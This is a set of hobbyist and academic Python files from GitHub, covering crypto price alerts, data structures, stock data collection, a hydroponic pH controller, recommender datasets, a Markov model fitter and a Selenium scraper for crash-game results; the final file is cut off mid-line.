+{"seq_id":"31011018682","text":"\n# get BTC price from Binance Platform as windows notification\n\nimport requests\nfrom win10toast import ToastNotifier\nimport time\n\ntoaster = ToastNotifier()\n\nwhile True:\n    url = 'https://api.binance.com/api/v3/ticker/price'\n    parameters = {\n        'symbol': 'BTCUSDT'\n    }\n\n    response = requests.get(url, params=parameters)\n    data = response.json()\n    price = float(data['price'])\n\n    toaster.show_toast(\"Bitcoin Price\", f\"${price:,.2f}\", duration=10)\n\n    time.sleep(300) # wait 5 minutes\n\n\n# get multi Cryptocurrency price from Binance Platform as windows notification\n\nimport requests\nfrom win10toast import ToastNotifier\nimport time\nfrom binance.client import Client\n\ntoaster = ToastNotifier()\nclient = Client ('' , '')\n\nbinance_symbols = ['BTCUSDT', 'VETUSDT']\nwhile True:\n    prices = client.get_all_tickers()\n    for symbol in binance_symbols:\n        price = float([p['price'] for p in prices if p['symbol'] == symbol][0])\n        toaster.show_toast(f\"{symbol} Price\", f\"${price:,.2f}\", duration=10)\n    time.sleep(300) # wait 5 minutes\n\n\n\n\n\n","repo_name":"Mehyar-Farzat/Get_Bitcoin_price","sub_path":"btc.py","file_name":"btc.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"1149436393","text":"class nodo:\n    def __init__(self, info):\n        self.info = info\n\nclass lista_sequencial_circ:\n    \n    def __init__(self,tamanhoMax):\n        self.lista = []\n        self.indice = 0\n        self.tamanho = tamanhoMax-1\n    \n    def inserirNoInicio(self, nodo):\n        if self.indice>self.tamanho:\n            print(\"List is full!\")\n            return\n        if self.indice==0:\n            self.lista.append(None)\n            self.lista[self.indice] = nodo\n            self.indice+=1\n            return\n        for i in range(self.indice,-1,-1):\n            if i == 0:\n                self.lista.append(None)\n                self.lista[i]=nodo\n                self.indice+=1\n                return\n            self.lista[i] = self.lista[i-1]\n    \n    \n    def inserirNoFinal(self, nodo):\n        if self.indice>self.tamanho:\n            print(\"List is full!\")\n            return\n        self.lista.append(None)\n        self.lista[self.indice] = nodo\n        self.indice+=1\n        self.lista.append(None)\n        self.lista[self.indice] = self.lista[0]\n    \n\n    def remover(self, info):\n        if not self.lista:\n            print('Empty list\\nThere is nothing to remove')\n            return\n        i=0\n        while self.lista[i].info!=info:\n            i+=1\n            if self.lista[i]==self.lista[0]:\n                print('Content does not exist!')\n                return\n        self.indice-=1 \n        for j in range(i,self.indice):\n            self.lista[j] = self.lista[j+1]\n        self.lista[self.indice] = self.lista[0]\n\n    def buscaPosicao(self,i , conteudo):\n        if self.indice==i:\n            print(\"Value not found\")\n            return\n        if self.indice == 0:\n            print(\"empty list\")\n            return\n        else:\n            if self.lista[i].info == conteudo:\n                print(\"position:\",i)\n                return\n            else:\n                self.buscaPosicao(i+1,conteudo)\n    \n    \n    def imprimir(self): \n        for i in range(self.indice):\n            print(self.lista[i].info, end = ' ') \n        print()\n\n    def imprimirLista(a, n, ind): \n        aux = ind \n     \n        while aux < n + ind : \n            print(a[(aux % n)], end = \" \") \n            aux = aux + 1\n\nlista = lista_sequencial_circ(5)\nlista.inserirNoInicio(nodo(99))\nlista.inserirNoFinal(nodo(5))\nlista.inserirNoFinal(nodo(10))\nlista.inserirNoFinal(nodo(1))\nlista.inserirNoFinal(nodo(41))\nlista.inserirNoFinal(nodo(14))\nlista.imprimir()\nlista.remover(10)\nlista.imprimir()\nlista.remover(1)\nlista.imprimir()\nlista.inserirNoInicio(nodo(9))\nlista.imprimir()\nlista.buscaPosicao(0,41)","repo_name":"jonathansaless/proj-algo-1","sub_path":"prova-parte-A/prova_parte-A.py","file_name":"prova_parte-A.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"16096009829","text":"import win32com.client\nimport sqlite3\n\n\nclass RealTimeCollect:\n    instance = None\n\n    def __init__(self):\n        self.objStockCur = CpStockCur()\n        conn = sqlite3.connect(\"stock_kind.db\", isolation_level=None) # connect to sqlite\n        self.c = conn.cursor()\n\n    def OnReceived(self):\n        timess = RealTimeCollect.instance.GetHeaderValue(18) # seconds\n        exFlag = RealTimeCollect.instance.GetHeaderValue(19) # expected-fill flag\n        c_price = RealTimeCollect.instance.GetHeaderValue(13) # current price\n        diff = RealTimeCollect.instance.GetHeaderValue(2) # change vs. previous close\n        cVol = RealTimeCollect.instance.GetHeaderValue(17) # instantaneous fill volume\n        vol = RealTimeCollect.instance.GetHeaderValue(9) # trading volume\n\n        if exFlag == ord('1'): # simultaneous-quote session (expected fill)\n            print(\"realtime (expected fill)\", timess, \"*\", c_price, \"change\", diff, \"fill vol\", cVol, \"volume\", vol)\n        elif exFlag == ord('2'): # during market hours (fill)\n            print(\"realtime (intraday fill)\", timess, c_price, \"change\", diff, \"fill vol\", cVol, \"volume\", vol)\n\n\n    def Request(self, code):\n        # check whether PLUS is connected\n        objCpCybos = win32com.client.Dispatch(\"CpUtil.CpCybos\")\n        bConnect = objCpCybos.IsConnect\n        if bConnect == 0:\n            print(\"PLUS is not connected properly. \")\n            return False\n\n        # get the current-price object\n        objStockMst = win32com.client.Dispatch(\"DsCbo1.StockMst\")\n        objStockMst.SetInputValue(0, code) # stock code\n        objStockMst.BlockRequest()\n\n        # request the current price and handle communication errors\n        rqStatus = objStockMst.GetDibStatus()\n        rqRet = objStockMst.GetDibMsg1()\n        print(\"comm status\", rqStatus, rqRet)\n        if rqStatus != 0:\n            return False\n\n        # read the current-price fields\n        code = objStockMst.GetHeaderValue(0) # stock code\n        name = objStockMst.GetHeaderValue(1) # stock name\n        time = objStockMst.GetHeaderValue(4) # time\n        c_price = objStockMst.GetHeaderValue(11) # close price\n        diff = objStockMst.GetHeaderValue(12) # change\n        s_price = objStockMst.GetHeaderValue(13) # open price\n        high = objStockMst.GetHeaderValue(14) # high\n        low = objStockMst.GetHeaderValue(15) # low\n        offer = objStockMst.GetHeaderValue(16) # ask price\n        bid = objStockMst.GetHeaderValue(17) # bid price\n        vol = objStockMst.GetHeaderValue(18) # volume\n        vol_value = objStockMst.GetHeaderValue(19) # trading value\n\n        print(\"code name time price change open high low ask bid volume value\")\n        print(code, name, time, c_price, diff, s_price, high, low, offer, bid, vol, vol_value)\n        return True\n\n    def start_collect_real_time_data(self):\n        self.c.execute(\"SELECT CODE, NAME FROM STOCK_KIND\")\n        codes = self.c.fetchall() # fetch stock codes and names as tuples (fetchall returns tuples)\n\n        for code in codes:\n            if not self.Request(code[0]):\n                return False\n            self.objStockCur.Subscribe(code[0])\n        self.c.close()\n\n    def stop_collect_real_time_data(self):\n        self.objStockCur.Unsubscribe()\n\n\nclass CpStockCur:\n    def __init__(self):\n        self.objStockCur = win32com.client.Dispatch(\"DsCbo1.StockCur\")\n\n    def Subscribe(self, code):\n        win32com.client.WithEvents(self.objStockCur, RealTimeCollect)\n        self.objStockCur.SetInputValue(0, code)\n        RealTimeCollect.instance = self.objStockCur\n        self.objStockCur.Subscribe()\n\n    def Unsubscribe(self):\n        self.objStockCur.Unsubscribe()\n","repo_name":"dakso0124/stock_program","sub_path":"real_time/real_time_price.py","file_name":"real_time_price.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"39056795343","text":"#simple way\na = int(input(\"Give a number: \"))\n\nif a%5 == 0:\n    print(True)\nelse:\n    print(False)\n\n#using function\ndef check_divisibility(b):\n    if b%5 == 0:\n        return True\n    return False\n\n#using class\nclass Divisible_by5:\n    def __init__(self,c):\n        self.c = c\n\n    def ans(self):\n        if self.c%5 == 0:\n            return True\n        return False\n","repo_name":"apatil241995/Python-practice-problems-Week-7","sub_path":"28-03-2022 and 29-03-2022/python practice peoblems/21 divisible_by_5/divisible_by_5.py","file_name":"divisible_by_5.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"23042211213","text":"import random\n\nclass Animal:\n\n    def __init__(self):\n        self.meal_need = []\n        self.vegetable_need = []\n        self.water_need = []\n        self.cold_resistance = []\n        self.heat_resistance = []\n        self.aggressiveness = []\n        self.predator_resistance = []\n        self.age = 0\n        self.score = None\n\n    def init_meal(self, meal, no_meal):\n        \"\"\" Initializes the animal's meat requirement \"\"\"\n\n        carn = []\n\n        for i in range(0, meal):\n            carn.append(1)\n\n        for i in range(0, no_meal):\n            carn.append(0)\n\n        for i in range(100 - len(carn)):\n            carn.append(random.randrange(0, 2))\n\n        random.shuffle(carn)\n\n        self.meal_need = carn\n\n    def init_vegetable(self, vegetable, novegetable):\n\n        \"\"\" Initializes the animal's vegetable requirement \"\"\"\n\n        veg = []\n\n        for i in range(0, vegetable):\n            veg.append(1)\n\n        for i in range(0, novegetable):\n            veg.append(0)\n\n        for i in range(100 - len(veg)):\n            veg.append(random.randrange(0, 2))\n\n        random.shuffle(veg)\n\n        self.vegetable_need = veg\n\n    def init_water(self, water, nowater):\n\n        \"\"\" Initializes the animal's water requirement \"\"\"\n\n        wat = []\n\n        for i in range(0, water):\n            wat.append(1)\n\n        for i in range(0, nowater):\n            wat.append(0)\n\n        for i in range(100 - len(wat)):\n            wat.append(random.randrange(0, 2))\n\n        random.shuffle(wat)\n\n        self.water_need = wat\n\n    def init_cold_resistance(self, rescold, norescold):\n\n        \"\"\" Initializes the animal's cold resistance \"\"\"\n\n        resistance = []\n\n        for i in range(0, rescold):\n            resistance.append(1)\n\n        for i in range(0, norescold):\n            resistance.append(0)\n\n        for i in range(100 - len(resistance)):\n            resistance.append(random.randrange(0, 2))\n\n        random.shuffle(resistance)\n\n        self.cold_resistance = resistance\n\n    def init_heat_resistance(self, resheat, noresheat):\n\n        \"\"\" Initializes the animal's heat resistance \"\"\"\n\n        resistance = []\n\n        for i in range(0, resheat):\n            resistance.append(1)\n\n        for i in range(0, noresheat):\n            resistance.append(0)\n\n        for i in range(100 - len(resistance)):\n            resistance.append(random.randrange(0, 2))\n\n        random.shuffle(resistance)\n\n        self.heat_resistance = resistance\n\n    def init_aggressiveness(self, aggressivity, no_agressivity):\n        \n        \"\"\" Initializes the animal's aggressiveness \"\"\"\n\n        aggressiveness = []\n\n        for i in range(0, aggressivity):\n            aggressiveness.append(1)\n\n        for i in range(0, no_agressivity):\n            aggressiveness.append(0)\n\n        for i in range(100 - len(aggressiveness)):\n            aggressiveness.append(random.randrange(0, 2))\n\n        random.shuffle(aggressiveness)\n\n        self.aggressiveness = aggressiveness\n    \n    def init_predator_resistance(self, pred_res, no_pred_res):\n        \n        \"\"\" Initializes the animal's predator resistance \"\"\"\n\n        resistance = []\n\n        for i in range(0, pred_res):\n            resistance.append(1)\n\n        for i in range(0, no_pred_res):\n            resistance.append(0)\n\n        for i in range(100 - len(resistance)):\n            resistance.append(random.randrange(0, 2))\n\n        random.shuffle(resistance)\n\n        self.predator_resistance = resistance\n","repo_name":"benoitRodde/AnimalSurvivor","sub_path":"server/animals/animal.py","file_name":"animal.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"39020552931","text":"import numpy as np\nimport pandas as pd\nimport scipy.sparse as sp\nimport torch\nimport torch.utils.data as data\n\n\nclass Dataset(data.Dataset):\n    def __init__(self, data_info, data_cfg, *args, **kwargs):\n        super().__init__()\n        self.data_info = data_info\n        self.data_cfg = data_cfg\n\n    def __getitem__(self, index):\n        raise NotImplementedError\n\n    def __len__(self):\n        raise NotImplementedError\n\n    def _get_idx_mat(self, train_data):\n        value_fill_mat = np.ones(train_data.shape[0])\n        shape = (self.data_info['user_ids_num'], self.data_info['photo_ids_num'])\n        train_mat = sp.coo_matrix((value_fill_mat, (train_data[:, 0], train_data[:, 1])),\n                                  shape=shape, dtype=np.float32)\n        train_mat = train_mat.todok()\n        return train_mat\n\n\nclass SamplingTrainSet(Dataset):\n    def __init__(self, data_info, data_cfg, df):\n        super().__init__(data_info, data_cfg, df)\n        self.num_item = self.data_info['photo_ids_num']\n        self.num_ng = self.data_cfg['num_ng']\n        self.train_data = df.loc[df[data_cfg.desired_action] == 1, ['user_id', 'photo_id']].values\n        self.train_mat = self._get_idx_mat(self.train_data)\n\n    def __len__(self):\n        return len(self.train_data)\n\n    def __getitem__(self, idx):\n        user, pos_item = self.train_data[idx]\n        all_item = [pos_item]\n        while len(all_item) <= self.num_ng:\n            j = np.random.randint(self.num_item)\n            while (user, j) in self.train_mat or j in all_item:\n                j = np.random.randint(self.num_item)\n            all_item.append(j)\n        return torch.LongTensor([user]), torch.LongTensor(all_item)\n\n\nclass AllTrainSet(Dataset):\n    def __init__(self, data_info, data_cfg, df):\n        super().__init__(data_info, data_cfg, df)\n        self.train_data = df.values\n\n    def _get_mbr_data(self, df):\n        df_all = []\n        for i, action in enumerate(self.data_cfg.effective_columns):\n            df_tmp = df[['user_id', 'photo_id', action]].copy()\n            df_tmp[\"action\"] = i\n            df_tmp = df_tmp.rename(columns={action: 'label'})\n            df_all.append(df_tmp)\n        df = pd.concat(df_all)\n        return df\n\n    def __len__(self):\n        return len(self.train_data)\n\n    def __getitem__(self, idx):\n        entry = self.train_data[idx]\n        return torch.LongTensor([entry[0]]), torch.LongTensor([entry[1]]), torch.LongTensor(\n            [entry[2]]), torch.FloatTensor([entry[3]])\n\n\nclass SamplingTestSet(Dataset):\n    def __init__(self, data_info, data_cfg, eval_cfg, df_train, df_test, seed=123):\n        super().__init__(data_info, data_cfg, df_train)\n        self.data_cfg = data_cfg\n        self.eval_cfg = eval_cfg\n        self.num_item = self.data_info['photo_ids_num']\n        self.num_ng = self.eval_cfg.num_negative_eval\n\n        if len(df_train.columns) > 2:\n            train_data = df_train.loc[df_train[data_cfg.desired_action] == 1, ['user_id', 'photo_id']].values\n        else:\n            train_data = df_train.values\n        self.train_mat = self._get_idx_mat(train_data)\n\n        if len(df_test.columns) == 2:\n            self.test_data = df_test[['user_id', 'photo_id']].values\n        else:\n            self.test_data = df_test.loc[df_test[data_cfg.desired_action] == 1, ['user_id', 'photo_id']].values\n        np.random.seed(seed)\n        self._ng_sample()\n\n    def _ng_sample(self):\n        self.users = []\n        self.items = []\n        for x in self.test_data:\n            u, i = x[0], x[1]\n            all_item = {i: 0}\n            while len(all_item) <= self.num_ng:\n                j = np.random.randint(self.num_item)\n                while (u, j) in self.train_mat:\n                    j = np.random.randint(self.num_item)\n                all_item[j] = 0\n            all_item = list(all_item.keys())\n            self.users.append([u])\n            self.items.append(all_item)\n\n    def __len__(self):\n        return len(self.test_data)\n\n    def __getitem__(self, idx):\n        user = self.users[idx]\n        item = self.items[idx]\n        return torch.LongTensor(user), torch.LongTensor(item)\n\n\nclass AllTestSet(Dataset):\n    def __init__(self, data_info, data_cfg, eval_cfg, df_train, df_test, seed=123):\n        super().__init__(data_info, data_cfg, df_train)\n        if len(df_train.columns) > 2:\n            train_data = df_train.loc[df_train[data_cfg.desired_action] == 1, ['user_id', 'photo_id']].values\n        else:\n            train_data = df_train.values\n        test_data = df_test.values\n\n        self.train_mask = self._get_idx_mat(train_data).tocsr()\n        self.ground_truth = self._get_idx_mat(test_data).tocsr()\n\n    def __getitem__(self, index):\n        return index, torch.from_numpy(self.ground_truth[index].toarray()).squeeze(), torch.from_numpy(\n            self.train_mask[index].toarray()).float().squeeze()\n\n    def __len__(self):\n        return self.data_info['user_ids_num']\n\n\n__all__ = [s for s in dir() if \"trainset\" in s.lower() or \"testset\" in s.lower()]\n","repo_name":"MHMR-recsys/MHMR","sub_path":"utility/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"34268164828","text":"#GardenManager.py\nfrom AnalogProbe import *\nfrom Pump import *\nfrom MCP3008 import MCP3008\nfrom tkinter import *\nimport time\nimport threading\n\n \nupperLimit = 10.50 #Starting pH for upper limit\nlowerLimit = 8.50 #Starting pH for lower limit\n\ndef addToUpperLimit():\n    global upperLimit\n    if(upperLimit < 13.9):\n        upperLimit = upperLimit + 0.1\n        upperLimitDisplay = Label (win, text=\"{:.1f}\".format(upperLimit), font=(\"Arial Bold\",40),bg='NavajoWhite2') #creates labels for upper limits\n        upperLimitDisplay.place(x=520,y=125)\n        #print(\"Upper Limit is now\",upperLimit)\n    else:\n        pass\ndef subFromUpperLimit():\n    global upperLimit\n    if(upperLimit > lowerLimit + 0.6):\n        upperLimit = upperLimit - 0.1\n        upperLimitDisplay = Label (win, text=\"{:.1f}\".format(upperLimit), font=(\"Arial Bold\",40),bg='NavajoWhite2')\n        upperLimitDisplay.place(x=520,y=125)\n        #print(\"Upper Limit is now\",upperLimit)\n    else:\n        pass\ndef addToLowerLimit():\n    global lowerLimit\n    if(lowerLimit < upperLimit - 0.6):\n        lowerLimit = lowerLimit + 0.1\n        lowerLimitDisplay = Label (win, text=\"{:.1f}\".format(lowerLimit), font=(\"Arial Bold\",40),bg='NavajoWhite2')\n        lowerLimitDisplay.place(x=520,y=275)\n        #print(\"Lower Limit is now\",lowerLimit)\n    else:\n        pass\ndef subFromLowerLimit():\n    global lowerLimit\n    if(lowerLimit > 0.1):\n        lowerLimit = lowerLimit - 0.1\n        lowerLimitDisplay = Label (win, text=\"{:.1f}\".format(lowerLimit), font=(\"Arial Bold\",40),bg='NavajoWhite2')\n        lowerLimitDisplay.place(x=520,y=275)\n        #print(\"Lower Limit is now\",lowerLimit)\n    else:\n        pass\n    \n# Dispenses 2ml of base solution\ndef dispenseBase():\n    # Creates object p1 of class Pump\n    p1 = Pump('/dev/ttyAMA1')\n    # D is for dispense, number is for volume in ml\n    p1.send_cmd(\"D,2\")\n    \n# Dispenses 2ml of acid solution\ndef dispenseAcid():\n    # Creates object p2 of class Pump\n    p2 = Pump('/dev/ttyAMA0')\n    # D is for dispense, number is for volume in ml\n    p2.send_cmd(\"D,2\")\n    \n\n#TODO: add conditionals so that lower limit will never exceed upper limit\n#Upper limit must not exceed 14, lower limit must not go below 0.\n    \nwin = Tk()\nf = Frame(win)\n\n# Title\nwin.title(\"pH Dashboard\")\nwin.minsize(width=800,height=480) #matched to Element14 7\" touchscreen display screen resolution\nwin.configure(bg='NavajoWhite3')\n\n\n# Displays current ph on a label and updates every 2 seconds\ndef displaypH():\n    while True:\n        # gets current pH and stores in variable currentph\n        currentph = \"{:.2f}\".format(AnalogProbe.getpH())\n        currentphlabel = Label (win, text=currentph,font=(\"Arial Bold\",60),bg='NavajoWhite2')\n        currentphlabel.place(x=240,y=170)\n        time.sleep(2)\n# Tests if pH is within range and dispenses Acid or Base accordingly\ndef regulatepH():\n    while True:\n        if(AnalogProbe.getpH() > upperLimit):\n            print(\"too basic. dispensing acid\")\n            dispenseAcid()\n            time.sleep(5)\n        elif(AnalogProbe.getpH() < lowerLimit):\n            print(\"too acidic. dispensing base\")\n            dispenseBase()\n            time.sleep(5)\n        else:\n            print(\"ph is within range. testing again in 5 seconds\")\n            time.sleep(5)\n        \n# Displays upper and lower limit before any changes are made via buttons\nupperLimitDisplay = Label (win, text=upperLimit, font=(\"Arial Bold\",40),bg='NavajoWhite2') #creates labels for upper limits\nupperLimitDisplay.place(x=520,y=125)\nlowerLimitDisplay = Label (win, text=lowerLimit, font=(\"Arial Bold\",40),bg='NavajoWhite2')\nlowerLimitDisplay.place(x=520,y=275)\n    \n# Displays Up and Down buttons to control the upper and lower thresholds\nbutton1 = Button(win, text='  Up  ', command = addToUpperLimit,bg='NavajoWhite2' )\nbutton1.place(x=650,y=120)\nbutton2 = Button(win, text='Down', command = subFromUpperLimit,bg='NavajoWhite2')\nbutton2.place(x=650,y=160)\nbutton3 = Button(win, text='  Up  ', command = addToLowerLimit,bg='NavajoWhite2')\nbutton3.place(x=650,y=270)\nbutton4 = Button(win, text='Down', command = subFromLowerLimit,bg='NavajoWhite2')\nbutton4.place(x=650,y=310)\n\n# Dispense Acid Button\nbutton5 = Button(win, text='Dispense Acid', command = dispenseAcid,bg='NavajoWhite2', font=(\"Arial Bold\",20))\nbutton5.place(x=80,y=370)\n\n# Dispense Base Button\nbutton6 = Button(win, text='Dispense Base', command = dispenseBase,bg='NavajoWhite2', font=(\"Arial Bold\",20))\nbutton6.place(x=330,y=370)\n    \n# Creates the \"pH: \" label\nlbl = Label (win, text=\"pH: \", font=(\"Arial Bold\",60),bg='NavajoWhite2')\nlbl.place(x=80,y=170)\n\nheader = Label(win, text = \" Auto pH Regulator \",font=(\"Arial Bold\",50),bg='NavajoWhite2' )\nheader.place(x=70,y=30)\n    \nx = threading.Thread(target = displaypH) #starts a new thread displaypH so that the program doesn't freeze\nx.start() \n\ny = threading.Thread(target = regulatepH)\ny.start()\n\nwin.mainloop()\n\n    \n    \n    ","repo_name":"shotaseanyasuda/Hydroponic-Garden-Manager-RaspberryPi4","sub_path":"Hydroponic Project/GardenManager.py","file_name":"GardenManager.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"73785423289","text":"import numpy as _np\nimport collections as 
_co\nimport bisect as _bs\nimport itertools as _iter\n\nimport scipy.sparse as _sparse\nimport scipy.misc as _misc\nimport scipy.sparse.linalg as _sla\nimport scipy.linalg as _la\n\nfrom scipy.stats import chi2\n\nfrom pathpy.Log import Log\nfrom pathpy.Log import Severity\n\n_np.seterr(all='warn')\n\n\nclass MarkovSequence:\n \"\"\" Instances of this class can be used to fit\n standard higher-order Markov models for\n sequences generated from concatenated paths \"\"\"\n\n def __init__(self, sequence):\n \"\"\"\n Generates a Markov model for a sequence, given\n as a single list of strings\n \"\"\"\n\n ## The sequence to be modeled\n self.sequence = sequence\n\n ## The transition probabilities of higher-order Markov chains\n self.P = {}\n\n ## the set of states of higher-order Markov chains\n self.states = {}\n self.states[1] = set(sequence)\n\n\n def fitMarkovModel(self, k=1):\n \"\"\" Generates a k-th order Markov model\n for the underlying sequence\n \"\"\"\n\n # TODO: Add support for k=0\n\n assert len(self.sequence)>0, \"Error: Empty sequence\"\n\n # MLE fit of transition probabilities\n self.P[k] = _co.defaultdict( lambda: _co.defaultdict( lambda: 0.0 ) )\n\n Log.add('Fitting Markov model with order k = ' + str(k))\n\n # Generate initial memory prefix\n mem = (())\n for s in self.sequence[:k]:\n mem += (s,)\n\n # count state transitions\n for s in self.sequence[k:]:\n self.P[k][mem][s] += 1.0\n\n # shift memory by one element\n mem = mem[1:] + (s,)\n\n # normalize transitions\n for m in self.P[k]:\n S = float(sum(self.P[k][m].values()))\n for s in self.P[k][m]:\n self.P[k][m][s] /= S\n Log.add('finished.')\n\n\n def getLikelihood(self, k=1, log=True):\n \"\"\"\n Returns the likelihood of the sequence\n assuming a k-th order Markov model\n \"\"\"\n\n if k not in self.P:\n self.fitMarkovModel(k)\n\n L = 0\n\n # Generate initial prefix\n mem = (())\n for s in self.sequence[:k]:\n mem += (s,)\n\n for s in self.sequence[k:]:\n L += _np.log(self.P[k][mem][s])\n\n # shift memory by one element\n mem = mem[1:] + (s,)\n\n if log:\n return L\n else:\n return _np.exp(L)\n\n\n def getBIC(self, k=1, m=1):\n \"\"\" Returns the Bayesian Information Criterion\n assuming a k-th order Markov model \"\"\"\n\n if k not in self.P:\n self.fitMarkovModel(k)\n\n if m not in self.P:\n self.fitMarkovModel(m)\n\n L_k = self.getLikelihood(k, log=True)\n L_m = self.getLikelihood(m, log=True)\n\n s = len(self.states[1])\n n = len(self.sequence)-k\n\n # the transition matrix of a first-order model with s states has s**2 entries, subject to the\n # constraint that entries in each row must sum up to one (thus effectively reducing\n # the degrees of freedom by a factor of s, i.e. we have s**2-s**1. 
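As a concrete check: with s = 3 states, a first-order chain has 3*(3-1) = 6 free parameters (9 entries minus 3 row-sum constraints) and a second-order chain has 9*(3-1) = 18.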
Generalizing this to order k,\n # we arrive at s**k * (s-1) = s**(k+1) - s**k derees of freedom\n bic = _np.log(n) * (s**k - s**m) * (s-1) - 2.0 * (L_k-L_m)\n\n return bic\n\n\n def getAIC(self, k=1, m=1):\n \"\"\" Returns the Aikake Information Criterion\n assuming a k-th order Markov model \"\"\"\n\n if k not in self.P:\n self.fitMarkovModel(k)\n\n if m not in self.P:\n self.fitMarkovModel(m)\n\n L_k = self.getLikelihood(k, log=True)\n L_m = self.getLikelihood(m, log=True)\n\n s = len(self.states[1])\n n = len(self.sequence)\n\n aic = 2 * (s**k - s**m) * (s-1) - 2.0 * (L_k - L_m)\n\n return aic\n\n\n def estimateOrder(self, maxOrder, method='BIC'):\n \"\"\" Estimates the optimal order of a Markov model\n based on Likelihood, BIC or AIC \"\"\"\n\n assert method == 'BIC' or method == 'AIC' or method == 'Likelihood', \"Error: Expecting method 'AIC', 'BIC' or 'Likelihood'\"\n\n values = []\n orders = []\n\n # We need k < m for the BIC and AIC calculation, which\n # is why we only test up to maxOrder - 1\n for k in range(1, maxOrder):\n if k not in self.P:\n self.fitMarkovModel(k)\n\n orders.append(k)\n\n if method == 'AIC':\n values.append(self.getAIC(k, maxOrder))\n elif method == 'BIC':\n values.append(self.getBIC(k, maxOrder))\n elif method == 'Likelihood':\n values.append(self.getLikelihood(k, log=True))\n\n if method == 'Likelihood':\n values.append(self.getLikelihood(maxOrder, log=True))\n orders.append(maxOrder)\n\n # return order at which likelihood is maximized\n return orders[_np.argmax(values)]\n else:\n # return order at which BIC/AIC are minimized\n return orders[_np.argmin(values)]\n","repo_name":"IngoScholtes/pathpy","sub_path":"pathpy/MarkovSequence.py","file_name":"MarkovSequence.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"77"} +{"seq_id":"1137393220","text":"from selenium import webdriver\r\nimport re\r\nimport time\r\nimport random\r\n\r\ndatafile = open(\"testData.txt\", \"a\")\r\n\r\nclass StreakBot():\r\n locationValue = []\r\n locationValue2 = []\r\n history = []\r\n automatedButton = None\r\n manualButton = None\r\n manualBetAmount = None\r\n startAutoBet = None\r\n manualAutoCashOut = None\r\n autoBetAmount = None\r\n cash = None\r\n def __init__(self):\r\n self.driver = webdriver.Chrome()\r\n self.locationValue = []\r\n self.locationValue2 = []\r\n self.history = []\r\n self.automatedButton = None\r\n self.manualButton = None\r\n self.startAutoBet = None\r\n self.manualBetAmount = None\r\n self.manualAutoCashOut = None\r\n self.startManualBet = None\r\n self.autoBetAmount = None\r\n self.cash = None\r\n\r\n def login(self):\r\n self.driver.get('https://roobet.com/crash')\r\n time.sleep(3)\r\n self.locationValue = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[2]/div[2]/div[1]')\r\n self.locationValue2 = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[2]/div[2]/div[2]')\r\n self.automatedButton = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[1]/div[2]')\r\n self.manualButton = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[1]/div[1]')\r\n self.startAutoBet = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/button')\r\n self.manualBetAmount = 
self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/div[1]/div/div[2]/input')\r\n self.manualAutoCashOut = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/div[2]/div/div[2]/input')\r\n self.startManualBet = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/button')\r\n self.autoBetAmount = self.driver.find_element_by_xpath('//*[@id=\"app\"]/div[2]/div[2]/div[1]/div[2]/div[1]/div[1]/div[2]/div[2]/div/div[2]/input')\r\n\r\n def start(self):\r\n for _ in iter(int,1):\r\n self.tick()\r\n time.sleep(5)\r\n\r\n def tick(self):\r\n text = self.locationValue.text\r\n text = re.sub('[x]', '', text)\r\n text2 = self.locationValue2.text\r\n text2 = re.sub('[x]', '', text2)\r\n print(text)\r\n if not self.history:\r\n self.history.append(float(text))\r\n print(\"Adding \" + text + \"To history\")\r\n \r\n elif float(text) != self.history[-1]: \r\n self.history.append(float(text))\r\n datafile.write(str(text))\r\n datafile.write(\"\\n\")\r\n print(\"Adding \" + text + \"To history\")\r\n \r\n\r\n def findStreak(self):\r\n biggestStreak = 0\r\n value = float(input(\"Enter limit value: \"))\r\n currentStreak = 0\r\n inStreak = 0\r\n for element in self.history: \r\n if inStreak == 1:\r\n if element >= value:\r\n inStreak = 0\r\n currentStreak = 0\r\n else:\r\n currentStreak+=1\r\n if currentStreak > 2:\r\n print(\"Streak Greater than 2\")\r\n elif element < value:\r\n inStreak = 1\r\n currentStreak = 1\r\n if currentStreak > biggestStreak:\r\n biggestStreak = currentStreak\r\n print(biggestStreak)\r\n print(\"The biggest Streak of values below \" + str(value) + \" was: \" + str(biggestStreak))\r\n\r\n\r\n def createHistory(self):\r\n self.history = open(\"testData.txt\").readlines()\r\n self.history = [word.strip() for word in self.history]\r\n self.history = [float(i) for i in self.history]\r\n\r\n def findAfterDouble(self):\r\n counter = 0\r\n inputValue = float(input(\"Enter limit value: \"))\r\n PositionArray = [0] * 25\r\n for counter in range(0,len(self.history)):\r\n if self.history[counter] < inputValue:\r\n if counter + 1 < len(self.history):\r\n if self.history[counter+1] < 